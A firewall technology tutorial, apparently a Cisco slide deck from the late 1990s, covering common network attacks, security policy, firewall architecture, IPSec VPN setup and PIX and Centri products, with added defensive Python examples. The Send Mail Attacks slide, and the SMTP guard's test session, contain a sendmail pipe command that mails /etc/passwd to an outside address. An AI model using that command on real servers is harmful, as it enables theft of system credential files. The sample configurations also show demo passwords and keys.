Internet Firewall Technology Tutorial

0999_03F8_c2 NW98_US_407

Agenda

Motivation
  Threats and Attacks
  Business Need
Design and Test Principles
  Policy
  Architecture
  Design
Implementation
  Cisco Solutions

Motivation: Security Threats and Common Network Attacks


Security Threats

Figure: four threat examples. Loss of privacy: a telnet login to foo.bar.org (username dan) whose password, m-y-p-a-s-s-w-o-r-d, is read off the wire letter by letter. Impersonation: "I'm Bob, send me all corporate correspondence with Cisco" (signed Bob). Denial of service: a CPU driven to exhaustion. Loss of integrity: a customer's $1000 deposit to the bank altered to $100.

Exploit Host Weaknesses

Figure: host 10.1.1.1 is attacked through a weakness on the host itself and signs off with "Good Bye".

Common Attacks

Routing attacks
Wiretapping
Active content
ICMP attacks
Denial of service attacks
TCP sequence attacks

Send Mail Attacks

Grabbing the /etc/passwd file; injecting a file or running a script

mail from: "|/bin/mail me@myhost.com < /etc/passwd"
250 "|/bin/mail me@myhost.com < /etc/passwd"... Sender ok
rcpt to: mickeymouse
550 mickeymouse... User unknown
data
354 Enter mail, end with "." on a line by itself
250 Mail accepted
quit

Password Cracking

Features: graphical brute forcing, cracking NT passwords, network session


Newer Internet Attacks

Teardrop 1
A fragmentation attack that exploits a reassembly bug with overlapping fragments and causes the targeted system to crash or hang

Teardrop 2
The first fragment starts at offset 0 and the second fragment begins inside the TCP header

Land
A SYN packet whose source address and port are the same as the destination address and port
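Added example, not from the tutorial: a detector for the two malformed-packet conditions described above (Teardrop's overlapping fragments and Land's source-equals-destination SYN), run over constructed packets. The header builders, addresses and sample traffic are constructed for the example.

```python
import struct
from collections import defaultdict

IP_MF = 0x2000      # "more fragments" bit in the IPv4 flags/offset field
TCP_SYN = 0x02      # SYN bit in the TCP flags byte


def ip_bytes(dotted):
    return bytes(int(x) for x in dotted.split("."))


def build_ipv4(src, dst, ident, offset_units, more_frags, payload, proto=6):
    """Constructed minimal IPv4 header (no options, checksum 0) + payload."""
    flags_off = (IP_MF if more_frags else 0) | (offset_units & 0x1FFF)
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident,
                      flags_off, 64, proto, 0, ip_bytes(src), ip_bytes(dst))
    return hdr + payload


def build_tcp(sport, dport, flags):
    """Constructed 20-byte TCP header: ports, seq, ack, data offset, flags, window, csum, urg."""
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 0x50, flags, 8192, 0, 0)


def parse_ipv4(pkt):
    (vihl, _tos, total, ident, flags_off, _ttl, proto, _csum,
     src, dst) = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (vihl & 0x0F) * 4
    return {"id": ident, "proto": proto,
            "src": ".".join(map(str, src)), "dst": ".".join(map(str, dst)),
            "mf": bool(flags_off & IP_MF),
            "offset": (flags_off & 0x1FFF) * 8,   # fragment offset in bytes
            "payload": pkt[ihl:total]}


def is_land(pkt):
    """Land: a SYN whose source address:port equals its destination address:port."""
    ip = parse_ipv4(pkt)
    if ip["proto"] != 6 or ip["offset"] != 0 or len(ip["payload"]) < 14:
        return False
    sport, dport = struct.unpack("!HH", ip["payload"][:4])
    syn = ip["payload"][13] & TCP_SYN          # TCP flags byte sits at offset 13
    return bool(syn) and ip["src"] == ip["dst"] and sport == dport


def find_overlapping_fragments(pkts):
    """Teardrop: group fragments by (src, dst, id, proto) and report every group
    in which a fragment's byte range starts inside the previous fragment."""
    groups = defaultdict(list)
    for p in pkts:
        ip = parse_ipv4(p)
        if ip["mf"] or ip["offset"]:           # only fragments take part in reassembly
            key = (ip["src"], ip["dst"], ip["id"], ip["proto"])
            groups[key].append((ip["offset"], ip["offset"] + len(ip["payload"])))
    overlapping = []
    for key, ranges in groups.items():
        ranges.sort()
        if any(s2 < e1 for (_s1, e1), (s2, _e2) in zip(ranges, ranges[1:])):
            overlapping.append(key)
    return overlapping


def sample_packets():
    """Constructed traffic: one Land SYN, one Teardrop pair, one well-formed pair."""
    return [
        build_ipv4("10.1.1.1", "10.1.1.1", 1, 0, False, build_tcp(23, 23, TCP_SYN)),
        # Teardrop: fragment 1 covers bytes 0-35, fragment 2 claims to start at byte 24
        build_ipv4("10.1.1.2", "10.1.1.1", 2, 0, True, b"A" * 36),
        build_ipv4("10.1.1.2", "10.1.1.1", 2, 3, False, b"B" * 8),
        # Well-formed: fragment 2 starts exactly where fragment 1 ends (byte 32)
        build_ipv4("10.1.1.3", "10.1.1.1", 3, 0, True, b"C" * 32),
        build_ipv4("10.1.1.3", "10.1.1.1", 3, 4, False, b"D" * 8),
    ]


def analyze(pkts):
    """Count Land packets and list fragment groups that overlap."""
    return {"land": sum(1 for p in pkts if is_land(p)),
            "teardrop": find_overlapping_fragments(pkts)}
```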

Other Items

SNMP v1 community strings
CERT advisories
X11, RPC, NIS, NFS, NTP, finger
UDP high ports
TCP high ports

Service Configuration

no service finger
no service pad
no service tcp-small-servers
no service udp-small-servers
no ip bootp server
no ip source-route
service password-encryption
enable secret YellowMegaMan
no enable password
no ip redirects
no ip directed-broadcast
no ip proxy-arp

The last three commands are interface-level and belong under each interface.

Motivation: Business Need


Traditional Business

Figure: the enterprise at the center, with employees, customers, partners and suppliers around it.

The Need to Be Networked

A new model of information technology
Being connected is not enough; electronic commerce is not enough. You need to be networked to all your important constituencies.
Open up internal operational systems and information to prospects, customers, partners, suppliers, and employees

The Global Networked Business

Figure: the enterprise networked with its employees, customers, partners and suppliers.

Design: Policy


What Are the Business Problems You Are Trying to Solve?

Figure: the Internet business need at the center, surrounded by Internet access, Internet presence, networked commerce, and VPN and extranets, each with its own security considerations.

What Are Their Risks?

Legend: R = Risk, S = Safeguard, T = Threat, V = Value, W = Weakness; RSF = Risk-Safeguard Factor, RVF = Risk-Value Factor, STF = Safeguard-Threat Factor, SVF = Safeguard-Value Factor, VTF = Value-Threat Factor, WTF = Weakness-Threat Factor.

Figure: causal diagram linking V, T, W, S and R through the factors VTF, WTF, STF, SVF, RVF and RSF; "+" marks the reinforcing links.

Simplified Causal Diagram

Threat: hazards facing the information (attacks/time)
Weakness: vulnerability of the processing ($/attack)
Safeguard: methods of protection ($/time)
Value: dollar value of information ($)
Assurance: confidence factor ($/time)

Figure: Weakness, Threat and Value feed into Risk; Safeguard and Assurance complete the loop.

Internet Access

Applications
Web access and e-mail (using an external mail server)
Streaming audio/video

Security issues
Protection of internal resources from outsiders
Limiting external privileges of internal users
Visibility of internal network addresses
Auditing usage and possible attacks

Internet Presence

Figure: e-mail and WWW servers exposed to the Internet.

Additional applications
E-mail server managed locally
Web server

Additional security issues
Protection of public resources
Separation of public and internal networks
Authentication of remote users

Networked Commerce

Figure: commerce gateways between the Internet and the internal business systems.

Additional applications
Electronic commerce with controlled access to business systems for ordering, etc.

Additional security issues
Secure gateway-internal communication
Client-commerce gateway encryption
Strong application authentication of the client

VPN and Extranets

Figure: extranet partners, mobile and home users, and a remote site all reach HQ across the Internet.

Additional applications
Private connections over a public network
Virtual Private Network (VPN)

Additional security issues
Encryption between remote users/sites and HQ
Very strong network authentication of the client

Design: Architecture


What Is a Firewall?

I think it was Pope Urban that first attempted a definition in 1094. He enforced his definition in 1095-1099. Zangi, the Prince of Mosul refuted it in 1144 and Saladin was left to stave off Pope Eugenius III and St. Bernard between 1146 and 1148. And, as everyone knows, Richard the Lion Hearted debated the definition with Saladin between 1189 and 1192 without a resolution. All of this is to say that this can become a religious issue and many deaths will occur from it.
Chris Lonvick

Security Technology Taxonomy

Identity
Accurately identify network users and their privileges

Integrity
Network integrity through: secure network perimeters; privacy and encryption; reliable operation

Active Audit
Provide auditing, accounting and active detection and response

Firewall Design Criteria: One

Where is your policy? Implement it.

Hosts offering public services/access are not secure
Internal network hosts should not offer public services/access
Private networks and hosts should not be visible

Firewall Design Criteria: Two

Know your network
Security for multiple Internet access points
Management and operation comfort
Network security cannot replace data security
Detailed security and usage accounting

Firewall Design Criteria: Three

A robust firewall is typically not one device
Layered topology; defense in depth
Redundancy and failover
Response plan

Internet Access Firewall Topology

Figure: a single device between the outside and the internal network.
Reasonable features and performance at a low cost
Usually a router with firewall capabilities

Internet Presence Firewall Topology

Figure: the outside connects to a dedicated firewall with public access servers placed on demilitarized zones (DMZs).
Dedicated firewall platforms
Multiple interfaces/layers
Many features, high performance

Lock-and-Key

Situation: you want a subset of hosts on a network to access a host on a remote network protected by a firewall. With lock-and-key access you can enable only the desired set of hosts to gain access, by having them authenticate through a TACACS+ server.

Lock-and-Key Configuration

aaa new-model
aaa authentication login lockkey tacacs+ enable
access-list 101 dynamic telecommuter timeout 5 permit ip any any
access-list 101 permit tcp any host 10.1.1.1 eq 23
interface e0
 ip address 10.1.1.1 255.255.255.0
 ip access-group 101 in
tacacs-server host 1.1.1.1
tacacs-server key cisco
line vty 0 4
 password 7 telecommuter
 login authentication lockkey
 autocommand access-enable timeout 2

Networked Commerce

Figure: a web client on the outside reaches the commerce gateway over an encrypted transaction; the gateway is coupled to the application servers inside.
Coupled gateway and application servers
Encryption and authentication

VPNs and Extranets

Strong encryption, authentication
Routers, firewalls, end systems

IPSec: Standard for VPN Encryption

Figure: encrypted IP across the Internet between the internal network and the remote side.

Standards compliance
IPSec AH/ESP encapsulated tunnels
IKE key management

Fully interoperable
Cisco IOS, firewalls, and other IPSec-compliant systems

Client support
Windows 95 and Windows NT 4.x (Cisco-provided software)
Windows NT 5.0 (Microsoft/Cisco partnership)

IPSec Modes

Tunnel mode:
  New IP HDR | IPsec HDR | IP HDR | Data
  (the original IP HDR and Data may be encrypted)

Transport mode:
  IP HDR | IPsec HDR | Data
  (Data may be encrypted)

Virtual Private Network Example

Figure: two sites whose gateways are 128.49.48.1 and 128.49.54.1; traffic is clear on each site's own network and encrypted between the two gateways.

VPN Configuration

crypto ipsec transform-set first ah-md5-hmac
 mode tunnel
crypto ipsec transform-set second ah-sha-hmac esp-des
 mode tunnel
!
crypto isakmp policy 5
 auth rsa-encr
 hash md5
 lifetime 3600
!
crypto map toBob 10 ipsec-isakmp
 set peer 128.49.54.1
 set transform-set first second
 match address 155
!
interface e0
 ip address 128.49.48.1 255.255.255.0
 crypto map toBob
!
access-list 155 permit ip 128.49.48.1 0.0.0.255 128.49.54.1 0.0.0.255

Define the IPsec policy: two transform sets providing encryption and authentication
Set the IKE policy
Create a crypto map: define the negotiating peer, prioritize the IPsec policy, match an access list
Configure the interface and assign the crypto map
Define the access list that selects all traffic between the two networks for encryption

Design: Test


Firewall Test Criteria: One

Where is your policy?
Who controls routers? Who controls firewalls? Who makes up the security team?

Check policy and well-known holes
Scan the network
Test the firewall and the services behind it
Use verification and IDS tools

Firewall Test Criteria: Two

Do things work as expected?
Scan firewall
Scan DMZ and services
Scan internal network
Invert policy rules on sniffer
Log and document everything

Logging

service timestamps debug datetime msec
service timestamps log datetime msec
logging buffered 16384
logging trap debugging
logging 169.222.32.1
logging source-interface loopback0
access-list 101 permit tcp any host 10.1.1.1 eq 23 log
ip ftp source-interface loopback0
ip ftp username c7200
ip ftp password 7 8675309G
exception protocol ftp
exception dump 10.1.1.1

Firewall Test Criteria: Three

Testing never ends
Know your network
Review logs
Educate staff and users
Keep revisions up to date

Implementation: Cisco Solutions


Cisco Firewall Product Line

Figure: the products plotted by feature set against performance, from the Cisco 1600/2500 with Cisco IOS FW features and the Centri Firewall for Windows NT up to the PIX Firewall.

Supported Applications

Telnet, Web, FTP, and SMTP
RealAudio, RealVideo, and VDOLive
Lotus Notes, IMAP, and LDAP
DNS resolves and zone transfers
RPC, R-commands
Other generic IP, TCP, and UDP

Content Filtering

Blocks Java, ActiveX, JavaScript and VBScript
URL logging and blocking
SMTP command filtering
  Block SMTP commands
  Block excess routing characters

Java Blocking

Figure: the web client sends an HTTP request to the web server; the firewall inspects the server reply (and the port command). A reply with no Java signature is let through; when the client has requested a Java applet and the reply carries the Java signature, the packet is dropped.

Attack Detection and Prevention

Events
Monitors the following statistics and conditions:
Total embryonic connections
Per-minute incoming new connection rate
Timer for TCP connections to reach established state
Packet count for duplicate SYN packets
Packet sequence numbers

Alerts

Non-statistical events may trigger alerts
Alerts set on groups of events or specific ones: DoS attacks, SMTP command attacks, or denied Java applet
Alerts are visual, email, and pager
Thresholds limit the number of alerts issued when repeating in a given timeframe
Email is based on MAPI (install Messaging)
Beeper is based on TAPI

Adaptive Security Algorithm (ASA)

Provides stateful connection policy
Connections are allowed out and the return session backflow is allowed; incoming connections must be explicitly enabled
Initial TCP sequence number randomized
Tracks source and destination ports and addresses, TCP sequences, and additional TCP flags
Access control list (ACL) policy support
UDP and TCP session state
  TCP: FIN bit
  UDP: one-minute default timer (except for DNS)

TCP Connections Inside to Outside: Initialization Phase

Fields per packet: IP checksum, source IP address, destination IP address, source port, destination port, sequence number, acknowledge, TCP checksum, code bits.

Sender -> PIX: 7363, 10.0.0.14, 171.68.10.2, 4005, 23, seq 100, ack -, 4512, SYN (+ data)
The PIX checks if a translation exists or not. If not, it creates one upon verifying NAT, global, access control and authentication, if any; a connection is also created.
PIX -> receiver: 6514, 171.69.236.5, 171.68.10.2, 4005, 23, seq 3050, ack -, 3124, SYN
Receiver and responder -> PIX: 3214, 171.68.10.2, 171.69.236.5, 23, 4005, seq 31, ack 3151, 4321, SYN-ACK
PIX -> sender: 4321, 171.68.10.2, 10.0.0.14, 23, 4005, seq 31, ack 201, 2143, SYN-ACK
(Figure labels: IP Spoofing, TCP Connection)

The PIX follows the adaptive security algorithm: (src IP, src port, dest IP, dest port) check, sequence number check, translation check. If the packet code bit was not SYN-ACK, the packet would have been dropped and logged.

Back spoofing: assume data length = 100 octets; the checksum is modified, not recalculated.

TCP Connections Inside to Outside: Data Transfer

Sender -> PIX: 4512, 10.0.0.14, 171.68.10.2, 4005, 23, seq 201, ack 132, 3412, ACK (+ data)
PIX -> receiver: 3912, 171.69.236.5, 171.68.10.2, 4005, 23, seq 3151, ack 132, 1234, ACK
Since the ACK bit is set, connection and translation entries should already exist.
Receiver and responder -> PIX: 2216, 171.68.10.2, 171.69.236.5, 23, 4005, seq 132, ack 3252, 2222, ACK
PIX -> sender: 3111, 171.68.10.2, 10.0.0.16, 23, 4005, seq 132, ack 233, 3311, ACK
The ASA checks again.

TCP Connections Inside to Outside: Termination Phase

Sender -> PIX: 1111, 10.0.0.14, 171.68.10.2, 4005, 23, seq 1000, ack 8000, 2222, FIN (+ data)
PIX -> receiver: 2222, 171.69.236.5, 171.68.10.2, 4005, 23, seq 3950, ack 800, 2222, FIN
Receiver and responder -> PIX: 4512, 171.68.10.2, 171.69.236.5, 23, 4005, seq 800, ack 4051, 2121, FIN-ACK
PIX -> sender: 1111, 171.68.10.2, 10.0.0.14, 23, 4005, seq 800, ack 1101, 1111, FIN-ACK

Back spoofing: assume data length = 100 octets; the checksum is modified, not recalculated.

The PIX will only accept a packet with code bits FIN-ACK; all other packets are dropped. Any packet after this packet would also be dropped. The connection is released immediately; the translation is released after the xlate timeout.
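The three phases above, replayed as an added example (not Cisco's code): a small Python model of the stateful checks the slides describe for an inside-to-outside connection, including one back-spoofing attempt that fails the code-bit check. Addresses and ports are the slides' (10.0.0.14:4005 to 171.68.10.2:23 via global 171.69.236.5); the ISN offset 2950 is derived from the slide's numbers (100 becomes 3050), and the remote host's own sequence numbers are constructed.

```python
from collections import namedtuple

# Just the fields the ASA checks; flags is a frozenset such as {"SYN", "ACK"}
Packet = namedtuple("Packet", "src sport dst dport seq ack flags data_len", defaults=[0])


class PIX:
    """Stateful inside-to-outside tracking modelled on the ASA slides."""

    def __init__(self, global_pool, isn_offset=2950):
        self.global_pool = list(global_pool)
        self.isn_offset = isn_offset  # constructed: the slide's ISN 100 leaves as 3050
        self.xlate = {}               # local address -> global address
        self.conns = {}               # (global, sport, remote, rport) -> {"state", "next_seq"}
        self.log = []

    def outbound(self, p):
        """Inside -> outside: a SYN creates xlate and connection; others must match one."""
        if p.src not in self.xlate:                      # NAT/global check
            self.xlate[p.src] = self.global_pool.pop(0)
        glob = self.xlate[p.src]
        key = (glob, p.sport, p.dst, p.dport)
        conn = self.conns.get(key)
        if conn is None:
            if "SYN" not in p.flags:
                return self._drop(p, "no connection for non-SYN outbound packet")
            # next_seq: next translated sequence number the inside host may use
            conn = self.conns[key] = {"state": "SYN_SENT", "next_seq": p.seq + self.isn_offset + 1}
        elif conn["state"] == "ESTABLISHED":
            conn["next_seq"] += p.data_len + ("FIN" in p.flags)
            if "FIN" in p.flags:
                conn["state"] = "FIN_WAIT"
        else:
            return self._drop(p, f"outbound packet not allowed in state {conn['state']}")
        return p._replace(src=glob, seq=p.seq + self.isn_offset)

    def inbound(self, p):
        """Outside -> inside: translation, connection, code bits and sequence are checked."""
        key = (p.dst, p.dport, p.src, p.sport)
        conn = self.conns.get(key)
        local = next((loc for loc, g in self.xlate.items() if g == p.dst), None)
        if conn is None or local is None:
            return self._drop(p, "no translation/connection entry")
        if conn["state"] == "SYN_SENT":
            if p.flags != frozenset({"SYN", "ACK"}) or p.ack != conn["next_seq"]:
                return self._drop(p, "expected SYN-ACK acknowledging the randomized ISN")
            conn["state"] = "ESTABLISHED"
        elif conn["state"] == "ESTABLISHED":
            if "ACK" not in p.flags or "SYN" in p.flags or p.ack > conn["next_seq"]:
                return self._drop(p, "bad code bits or sequence number")
        else:  # FIN_WAIT
            if p.flags != frozenset({"FIN", "ACK"}):
                return self._drop(p, "only FIN-ACK accepted after FIN")
            del self.conns[key]                          # connection released immediately
        return p._replace(dst=local, ack=p.ack - self.isn_offset)

    def _drop(self, p, why):
        self.log.append(f"DROP {p.src}:{p.sport}->{p.dst}:{p.dport}: {why}")
        return None


def walk_through():
    """Replay the slides' three phases plus one back-spoofing attempt."""
    pix = PIX(["171.69.236.5"])
    SYN, ACK = frozenset({"SYN"}), frozenset({"ACK"})
    SYNACK, FINACK = frozenset({"SYN", "ACK"}), frozenset({"FIN", "ACK"})
    inside, glob, outside = "10.0.0.14", "171.69.236.5", "171.68.10.2"
    r = {}
    syn = pix.outbound(Packet(inside, 4005, outside, 23, 100, 0, SYN))
    r["translated_syn"] = (syn.src, syn.seq)                       # ISN 100 -> 3050
    # back spoofing: right addresses and ports, but code bit SYN instead of SYN-ACK
    r["spoof"] = pix.inbound(Packet(outside, 23, glob, 4005, 31, 3051, SYN))
    r["synack_ack"] = pix.inbound(Packet(outside, 23, glob, 4005, 31, 3051, SYNACK)).ack
    pix.outbound(Packet(inside, 4005, outside, 23, 101, 32, ACK, data_len=100))
    r["data_ack"] = pix.inbound(Packet(outside, 23, glob, 4005, 32, 3151, ACK)).ack
    pix.outbound(Packet(inside, 4005, outside, 23, 201, 32, FINACK))
    r["fin_ack_ok"] = pix.inbound(Packet(outside, 23, glob, 4005, 32, 3152, FINACK)) is not None
    r["after_release"] = pix.inbound(Packet(outside, 23, glob, 4005, 33, 3152, ACK))
    r["log"] = pix.log
    return r
```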

Static vs. Conduit


Static
A static maps a global (outside) address to an inside (local) address. Any access to the global goes to the mapped inside address. This gives an inside machine with an illegal address a presence on the outside with a legal address. A static is secure (protected).

Conduit
A conduit is a hole through the firewall allowing outside machines to initiate connections to inside machines. It is related to a static in that a static maps a global address to a local machine. Conduits are only as secure as you make them. They are used for service items.

Authorization

Figure: Joe on the Internet telnets through the PIX Firewall (with a DMZ holding DNS/mail) to Inside Host A on the intranet; Cisco Secure holds his user profile.

User profile:
id=Joe Fail=0 Service=Shell Cmd=Telnet{ Permit Host A} Cmd=FTP{ Permit Host B}

SYN Flood Defender

Throttles both internal and external maximum sessions
Inbound: controls SYN flooding (denial of service)
Outbound: limits maximum sessions (controls applications such as Microsoft's Internet Explorer)
Protects session resources from being depleted
Maintains high network reliability

SYN Floods

Figure: an attacker on the Internet tries to kill the mail server with a stream of SYNs. With the PIX limit set to 2, two SYNs reach the mail server (allowed) and the rest are stopped at the outside interface; all allowed SMTP commands still pass from outside to inside.

Content Filter

Figure: an outside host on the Internet tries to get information out of the mail server over SMTP with NOOP and DEBUG; only commands in the allowed set pass from outside to inside and are answered OK.
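The SMTP command filtering on this slide and the Send Mail Attacks transcript earlier in the deck, illustrated with an added example that is not Cisco's Mail Guard code: a guard that passes only a minimal command set (assumed here to be the RFC 821 minimum HELO, MAIL, RCPT, DATA, RSET, NOOP, QUIT) and rejects addresses carrying pipe or routing characters, while leaving message-body lines after DATA alone. The sample session and the reply codes are constructed.

```python
ALLOWED = {"HELO", "MAIL", "RCPT", "DATA", "RSET", "NOOP", "QUIT"}  # assumed minimal set
ROUTING_CHARS = set("|%!")   # shell pipe plus the old percent-hack and UUCP routing characters


def address_is_clean(addr):
    """Reject pipes, %/! routing and nested source routes such as @relay:user@host."""
    if ROUTING_CHARS & set(addr):
        return False
    if addr.startswith("@") or addr.count("@") > 1 or ":" in addr:
        return False
    return True


def filter_command(line):
    """Return (verb, allowed, reply) for one client command line.

    The replies are constructed for this example; they stand in for whatever
    the guard answers on the server's behalf when it refuses a command."""
    verb, _, arg = line.strip().partition(" ")
    verb = verb.upper()
    if verb not in ALLOWED:
        return verb, False, "500 command unrecognized"
    if verb in ("MAIL", "RCPT"):
        addr = arg.partition(":")[2].strip().strip("<>")
        if not address_is_clean(addr):
            return verb, False, "501 address rejected by mail guard"
    return verb, True, "250 OK"


def filter_session(lines):
    """Run a client transcript through the guard.  Lines after an accepted DATA
    are message body, not commands, and pass untouched until the '.' line."""
    verdicts, in_data = [], False
    for line in lines:
        if in_data:
            if line.strip() == ".":
                in_data = False
            continue
        verb, ok, reply = filter_command(line)
        verdicts.append((verb, ok, reply))
        if verb == "DATA" and ok:
            in_data = True
    return verdicts


SAMPLE_SESSION = [  # constructed transcript mixing the slides' probes with normal commands
    "HELO mailhost.example.com",
    'mail from: "|/bin/mail me@myhost.com < /etc/passwd"',  # pipe trick from the Send Mail slide
    "MAIL FROM:<alice@example.com>",
    "RCPT TO:<@relay.example.net:bob@inside.example.com>",   # nested source route
    "RCPT TO:<bob%inside.example.com@relay.example.net>",    # percent-hack routing
    "RCPT TO:<bob@inside.example.com>",
    "DEBUG",                                                 # probe from the Content Filter slide
    "NOOP",
    "DATA",
    "Subject: status",
    "DEBUG",                                                 # inside the message body: not a command
    ".",
    "QUIT",
]


def blocked_commands(lines=SAMPLE_SESSION):
    """Verbs the guard refused, in order of appearance."""
    return [verb for verb, ok, _ in filter_session(lines) if not ok]
```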

Client VPN: PIX and Ravlin IPSec

Figure: encrypted IP across the Internet between the client and the internal network.

Standards compliance
IPSec AH/ESP encapsulated tunnel
IKE key management

Wire-speed performance
Ethernet now; Fast Ethernet late CY98

Fully interoperable
Cisco IOS and other IPSec-compliant systems

PIX with OTP Configuration

Configuration on the PIX manager:
Go to the PIX manager: username = pixadmin, URL = 10.0.0.0.100:8080, password = cisco

On the PIX manager: click Authentication, select TACACS+ server, click Add, server IP address = 10.0.0.100, encryption key: spackle, click OK

On the PIX manager: select Authentication, select "authenticate all internal hosts" or whatever is desired. Assume PIN = 1234, passcode = 5551212. Click Add, click OK, click Save.

PIX with OTP Session

Telnet prompt:
Username: megaman
Enter passcode: 5551212

FTP prompt:
Connected to 172.16.50.87
220-FTP authentication
220 TS09B6F FTP server (version Cisco Micro WebServer) ready
User (172.16.50.87:(none)): megaman
331-Enter PASSCODE:
331 Hello root, send password
Password: 5551212
230-Login user root OK
230

HTTP prompt (Internet Explorer):
You need a password to access this page
Resource: HTTP authentication
Username: megaman
Password: 5551212

HTTP prompt (Netscape):
Username and password required
Enter username for HTTP authentication at 172.16.50.87
User name: megaman
Password: 5551212

PIX with Three Interfaces

Figure: the PIX outside interface faces the Internet (public network); the perimeter network (DMZ, PIX address 192.168.0.1) holds a web server at 192.168.0.2 and an FTP server at 192.168.0.3; the private network (PIX address 10.0.0.3) holds the TACACS+ server at 10.0.0.100. A web server for the inside network allows access only from 172.28.0.0 and 172.16.50.0.

PIX with Three Interfaces

nameif ethernet0 outside security0
nameif ethernet1 inside security100
nameif ethernet2 dmz security50
enable password 8Ry2YjIyt7RRXU24 encrypted
passwd 2KFQnbNIdI.2KYOU encrypted
hostname pixfirewall
failover
names
name 192.168.0.2 webserver
name 192.168.0.3 ftpserver
pager lines 24
syslog output 20.3
no syslog console
interface ethernet0 auto
interface ethernet1 auto
interface ethernet2 auto
ip address outside 172.16.50.3 255.255.255.0
ip address inside 10.0.0.3 255.0.0.0
ip address dmz 192.168.0.1 255.255.255.0
arp timeout 14400
global (outside) 1 172.16.50.76-172.16.50.85
global (dmz) 1 192.168.0.90-192.168.0.99
nat (inside) 1 10.0.0.0 255.0.0.0
nat (dmz) 1 192.168.0.0 255.255.255.0
static (dmz,outside) 172.16.50.76 webserver 200 200
static (dmz,outside) 172.16.50.77 ftpserver
static (inside,outside) 172.16.50.80 10.0.0.110
conduit (dmz,outside) 172.16.50.76 80 tcp 0.0.0.0 0.0.0.0
conduit (dmz,outside) 172.16.50.77 21 tcp 0.0.0.0 0.0.0.0
conduit (inside,outside) 172.16.50.80 21 tcp 172.28.0.0 255.255.0.0
conduit (inside,outside) 172.16.50.80 80 tcp 172.28.0.0 255.255.0.0
conduit (inside,outside) 172.16.50.80 21 tcp 172.16.50.0 255.255.255.0
conduit (inside,outside) 172.16.50.80 80 tcp 172.16.50.0 255.255.255.0
age 10
rip outside passive
no rip outside default
rip inside passive
rip inside default
no rip dmz passive
rip dmz default
route outside 0.0.0.0 0.0.0.0 172.16.50.1 1
timeout xlate 24:00:00 conn 12:00:00 udp 0:02:00
timeout rpc 0:10:00 h323 0:05:00 uauth 0:05:00
tacacs-server host 10.0.0.100 abc
aaa authentication any inbound 0.0.0.0 0.0.0.0 tacacs+
no snmp-server location
no snmp-server contact
snmp-server community public
telnet 10.0.0.100 255.255.255.255
mtu outside 1500
mtu inside 1500
mtu dmz 1500
: end
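An added example (not Cisco's code) that audits the static and conduit lines of the configuration above: it resolves each conduit to the inside host it exposes and the source network allowed to reach it, lists the conduits open to any source, and confirms the inside web server is reachable only from 172.28.0.0/16 and 172.16.50.0/24. The configuration excerpt is the slide's; test addresses such as 198.51.100.7 are constructed.

```python
import ipaddress
import re

NAME_RE = re.compile(r"^name (\S+) (\S+)$")
STATIC_RE = re.compile(r"^static \((\w+),(\w+)\) (\S+) (\S+)")
CONDUIT_RE = re.compile(r"^conduit \((\w+),(\w+)\) (\S+) (\d+) (\w+) (\S+) (\S+)$")

SAMPLE_CONFIG = """
name 192.168.0.2 webserver
name 192.168.0.3 ftpserver
static (dmz,outside) 172.16.50.76 webserver 200 200
static (dmz,outside) 172.16.50.77 ftpserver
static (inside,outside) 172.16.50.80 10.0.0.110
conduit (dmz,outside) 172.16.50.76 80 tcp 0.0.0.0 0.0.0.0
conduit (dmz,outside) 172.16.50.77 21 tcp 0.0.0.0 0.0.0.0
conduit (inside,outside) 172.16.50.80 21 tcp 172.28.0.0 255.255.0.0
conduit (inside,outside) 172.16.50.80 80 tcp 172.28.0.0 255.255.0.0
conduit (inside,outside) 172.16.50.80 21 tcp 172.16.50.0 255.255.255.0
conduit (inside,outside) 172.16.50.80 80 tcp 172.16.50.0 255.255.255.0
"""


def parse_pix(text):
    """Collect name, static and conduit lines; statics are keyed by global address."""
    names, statics, conduits = {}, {}, []
    for raw in text.splitlines():
        line = raw.strip()
        m = NAME_RE.match(line)
        if m:
            names[m.group(2)] = m.group(1)          # symbolic name -> address
            continue
        m = STATIC_RE.match(line)
        if m:
            statics[m.group(3)] = {"iface": m.group(1),
                                   "local": names.get(m.group(4), m.group(4))}
            continue
        m = CONDUIT_RE.match(line)
        if m:
            # PIX conduit syntax: global_ip port protocol foreign_ip foreign_mask
            conduits.append({"iface": m.group(1), "global": m.group(3),
                             "port": int(m.group(4)), "proto": m.group(5),
                             "src": ipaddress.ip_network(f"{m.group(6)}/{m.group(7)}",
                                                         strict=False)})
    return statics, conduits


def exposures(statics, conduits):
    """One row per conduit: (interface, local host, proto, port, permitted source network)."""
    rows = []
    for c in conduits:
        st = statics.get(c["global"])
        local = st["local"] if st else c["global"]   # no static: the global is the host itself
        rows.append((c["iface"], local, c["proto"], c["port"], str(c["src"])))
    return rows


def reachable(statics, conduits, src_ip, local_host, port, proto="tcp"):
    """Can src_ip open proto/port to local_host through some conduit?"""
    addr = ipaddress.ip_address(src_ip)
    return any(r[1] == local_host and r[2] == proto and r[3] == port
               and addr in ipaddress.ip_network(r[4])
               for r in exposures(statics, conduits))


def open_to_world(statics, conduits):
    """Conduits whose permitted source is 0.0.0.0/0, i.e. reachable from anywhere."""
    return [r for r in exposures(statics, conduits) if r[4] == "0.0.0.0/0"]
```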

Centri Firewall

Windows NT firewall, ICSA certified
Version 4.0.2 now shipping!
Evaluation software on the web at: http://www.cisco.com/centri

Ease of Use

Installation wizard
Steps through initial configuration
Predefined security policies

Graphical policy manager
Drag-and-drop security policies

Secure remote administration

Secure Remote Administration

Figure: the Centri firewall is administered both from the private network and across the Internet and the ISP network.

Secure remote admin
MS authenticated RPC
Centri's asymmetric authentication
From trusted or untrusted sides

Reporting

Reports may be run on demand and scheduled to run at fixed times (e.g. Mondays at 2 a.m.)
Reports are presented in HTML or text and may be stored on the web server in the product (examiner) or sent to an e-mail address
To view reports it is simplest to use the embedded browser in Centri, though you may use another browser if desired (port 8080, no authentication)

There are three types of reports:
Warning (security issues and product oddities)
Service (statistical details per service, no aggregates)
Connection (polls for open connections per service, no aggregates)

Flexible Security Policies

Figure: a security policy ranges from open through restrictive to closed, and may be set by IP address (e.g. 161.44.75.12), by NT username, by time of day, or by application.

Centri Firewall Architecture

Kernel proxies
Implemented in the Windows NT kernel
Custom TCP/IP stack
Packet-filtering speed, proxy functionality
Protects against common vulnerabilities in Windows NT (WinNuke, NetBIOS holes, etc.)

Intercept architecture
Preservation of the original network stack
Firewall communication is also protected
Capability of running servers on the firewall

Centri Firewall Design

